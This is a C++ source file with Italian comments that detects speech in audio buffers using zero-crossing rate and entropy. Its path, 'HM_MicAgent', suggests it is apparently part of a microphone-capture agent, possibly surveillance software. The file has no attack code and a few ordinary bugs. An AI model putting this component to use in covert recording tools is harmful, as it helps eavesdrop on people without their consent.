HM_MicAgent/QSpeechDetect.cpp
#include <stdio.h>
#include <math.h>
#include "QSpeechDetect.h"
#define SLICE_INTERVAL 4 // 1/4 di secondo
// pBuffer -> Puntatore al buffer che contiene i dati
// uSamplesPerSecond -> Samples acquisiti ogni secondo
// uBitsPerSecond -> Bits di precisione per ogni sample
// uRecordChannels -> Canali di registrazione
// uBufLen -> Lunghezza (in byte) del buffer puntato da pBuffer
QSpeechDetect::QSpeechDetect(PBYTE pBuffer, UINT uSamplesPerSecond, UINT uBitsPerSecond, UINT uRecordChannels, UINT uBufLen, FLOAT fThresh):
uBits(16), uChannels(2), uSamples(44100), fZeroThreshold(0.26f)
{
register UINT i, j;
if(pBuffer == NULL || uSamplesPerSecond == 0 || uBitsPerSecond == 0 || uRecordChannels == 0 || uBufLen == 0)
return;
if(uBufLen < uRecordChannels * (uBitsPerSecond / 8))
return;
fZeroThreshold = fThresh;
uSamples = uSamplesPerSecond;
uBits = 16; // Lo settiamo a 16 in ogni caso perche' allochiamo pData come SHORT
uChannels = uRecordChannels;
uLength = uBufLen;
uTotalSamples = uLength / (uBits / 8);
uTotalSamplesPerChannel = uTotalSamples / uChannels;
pData = NULL;
pTable = NULL;
pData = new(std::nothrow) SHORT[uTotalSamplesPerChannel];
if(pData == NULL)
return;
pTable = new(std::nothrow) SHORT[0xFFFF + 1];
if(pTable == NULL)
return;
for(i = 0, j = 0; i < uBufLen; i += (uBits / 8) * uChannels, j++)
pData[j] = *((SHORT *)(&pBuffer[i]));
}
QSpeechDetect::~QSpeechDetect()
{
if(pData){
delete[] pData;
pData = NULL;
}
if(pTable){
delete[] pTable;
pTable = NULL;
}
return;
}
void QSpeechDetect::SetBuffer(PBYTE pBuffer, UINT uBufLen)
{
register UINT i, j;
if(pBuffer == NULL || uBufLen < uChannels * (uBits / 8))
return;
uLength = uBufLen;
uTotalSamples = uLength / (uBits / 8);
uTotalSamplesPerChannel = uTotalSamples / uChannels;
if(pData){
delete[] pData;
pData = NULL;
}
pData = new(std::nothrow) SHORT[uTotalSamplesPerChannel];
if(pData == NULL)
return;
for(i = 0, j = 0; i < uBufLen; i += (uBits / 8) * uChannels, j++)
pData[j] = *((SHORT *)(&pBuffer[i]));
}
BOOL QSpeechDetect::IsVoice()
{
INT iTmp;
UINT i, j, k;
UINT uSamplesPerInterval, uIntervals, uPerc = 0;
SHORT sSampleA, sSampleB;
FLOAT fAvg, fEntropy = 0.0f, fVar;
PFLOAT fZero = NULL;
if(pData == NULL || pTable == NULL)
return FALSE;
memset(pTable, 0x00, sizeof(SHORT) * 0xFFFF);
// Calcoliamo lo zero-crossing rate su un intervallo lungo SLICE_INTERVAL
uSamplesPerInterval = uSamples / SLICE_INTERVAL; // Sample in un intervallo
uIntervals = uTotalSamplesPerChannel / uSamplesPerInterval; // Numero di slice da analizzare
fZero = new(std::nothrow) FLOAT[uIntervals + 1];
if(fZero == NULL)
return TRUE; // Nel dubbio, diciamo che c'e' voce :)
for(i = 0, k = 0; i < uTotalSamplesPerChannel; i += uSamplesPerInterval, k++){
fAvg = 0.0f;
for(j = i; j < i + uSamplesPerInterval - 1 && j < uTotalSamplesPerChannel - 1; j++){
sSampleA = pData[j];
sSampleB = pData[j + 1];
iTmp = abs(((sSampleB >= 0) ? 1 : -1) - ((sSampleA >= 0) ? 1 : -1));
fAvg += (FLOAT)iTmp;
}
fAvg /= 2.0f * uTotalSamplesPerChannel;
fZero[k] = fAvg * 100.0f;
}
uPerc = 0;
for(i = 0; i < uIntervals; i++){
if(fZero[i] <= fZeroThreshold && fZero[i] >= ZERO_SILENCE_THRESHOLD)
uPerc++;
}
// Tabella per l'entropia
for(i = 0; i < uTotalSamplesPerChannel; i++){
pTable[(USHORT)pData[i]] += 1;
}
// Calcola l'entropia
for(i = 0; i < 0xFFFF; i++){
if(pTable[i]){
fVar = (FLOAT)pTable[i] / (FLOAT)uTotalSamplesPerChannel;
fEntropy += (-(fVar * log2(fVar)));
}
}
if(pData){
delete[] pData;
pData = NULL;
}
if(fZero)
delete[] fZero;
// Per disabilitare il filtro sull'entropia e' sufficiente
// commentare: "&& fEntropy > ENTROPY"
if(uPerc > ZERO_SENSITIVITY && fEntropy > ENTROPY)
return TRUE;
else
return FALSE;
}
inline FLOAT QSpeechDetect::log2(float x)
{
return ( log(x) / log((FLOAT)2) );
}